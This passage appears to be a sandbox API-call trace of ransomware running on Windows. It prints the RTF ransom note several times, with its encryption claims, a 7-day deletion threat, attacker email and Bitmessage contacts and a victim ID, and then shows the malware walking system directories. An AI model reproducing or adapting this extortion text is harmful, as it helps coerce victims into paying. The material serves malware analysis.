reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0257.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x724fe8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¢\"\x15sdx \x98û#\x17³#W+¦g«ÅT\x18\x8a)s\x06", lpUsedDefaultChar=0x0) returned 8717 [0257.927] WriteFile (in: hFile=0x2d0, lpBuffer=0x724fe8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x724fe8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0257.928] CloseHandle (hObject=0x2d0) returned 1 [0257.929] Sleep (dwMilliseconds=0x3e8) [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount2=68) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount2=47) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 